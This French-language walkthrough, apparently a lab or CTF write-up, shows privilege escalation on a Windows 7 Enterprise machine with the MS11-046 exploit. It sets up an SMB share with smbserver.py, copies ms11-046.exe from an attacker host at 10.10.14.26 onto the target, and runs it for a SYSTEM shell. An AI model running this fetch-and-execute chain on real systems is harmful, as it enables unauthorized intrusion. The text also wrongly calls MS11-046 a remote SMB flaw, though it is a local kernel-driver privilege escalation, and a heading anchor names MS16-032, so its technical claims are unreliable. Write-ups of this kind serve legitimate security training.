# Windows 7 Enterprise (Kernel Exploitation)

#### **Vérification des informations système**

Avec la commande **`systeminfo`**, nous identifions que la machine utilise **Windows 7 Enterprise**, ce qui ouvre la possibilité d'exploiter des vulnérabilités connues pour cette version.

```powershell
systeminfo
```

Le résultat nous indique que la machine utilise **Windows 7 Enterprise**, avec la version suivante :

```plaintext
OS VERSION: 6.1.7600 N/A Build 7600
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FRJUsSoX8ZtehnzrqKLt4%2Fimage.png?alt=media&#x26;token=fcc9437d-9b96-49f2-9334-4feaa5b07d7f" alt=""><figcaption></figcaption></figure>

### **Exploitation Vulnérabilité** MS11-046 <a href="#exploitation-vulnerabilite-ms16-032" id="exploitation-vulnerabilite-ms16-032"></a>

Cela nous permet de savoir que la machine pourrait être vulnérable à certaines failles connues, telles que **MS11-046**, une vulnérabilité dans le service **Windows SMB**.

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046>" %}

> La vulnérabilité **MS11-046** permet à un attaquant de s'exécuter à distance avec les privilèges **NT AUTHORITY\SYSTEM** via le service SMB. Pour exploiter cette vulnérabilité, nous allons transférer et exécuter un fichier malveillant sur la machine cible.

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F6hwgHVTlNUkJuMkDexFl%2Fimage.png?alt=media&#x26;token=84c1290b-b7d5-4e0c-9342-92d9187335ae" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FadRlUWjBeOHCj4aou9Gq%2Fimage.png?alt=media&#x26;token=79857745-3e5e-4492-ac9b-2f24e91281f6" alt=""><figcaption></figcaption></figure>

### File Transfer Windows (smb) <a href="#file-transfer-windows" id="file-transfer-windows"></a>

> Nous utilisons **smbserver.py** pour partager un répertoire contenant le fichier exploit **ms11-046.exe**. Ce fichier est ensuite copié sur la machine cible.

```bash
smbserver.py share $(pwd) -smb2support
```

Depuis la machine cible, nous copions le fichier malveillant à l'aide de la commande SMB :

```powershell
copy \\10.10.14.26\share\ms11-046.exe ms11.exe
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FKJFhyH940T4q0VCKGZXi%2Fimage.png?alt=media&#x26;token=aa9b22b2-ce4d-4fba-8ef7-21a4f0d761ab" alt=""><figcaption></figcaption></figure>

**Exécution de l'exploit**

Une fois le fichier transféré, nous exécutons **ms11-046.exe** sur la machine cible pour exploiter la vulnérabilité et obtenir un shell avec les privilèges SYSTEM. Pour cela, nous utilisons la commande suivante :

```powershell
.\ms11.exe
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F6vnVqiaLFFFj9YcNN4tr%2Fimage.png?alt=media&#x26;token=1a1af1c5-1707-4d5b-a445-5230ab0e0078" alt=""><figcaption></figcaption></figure>
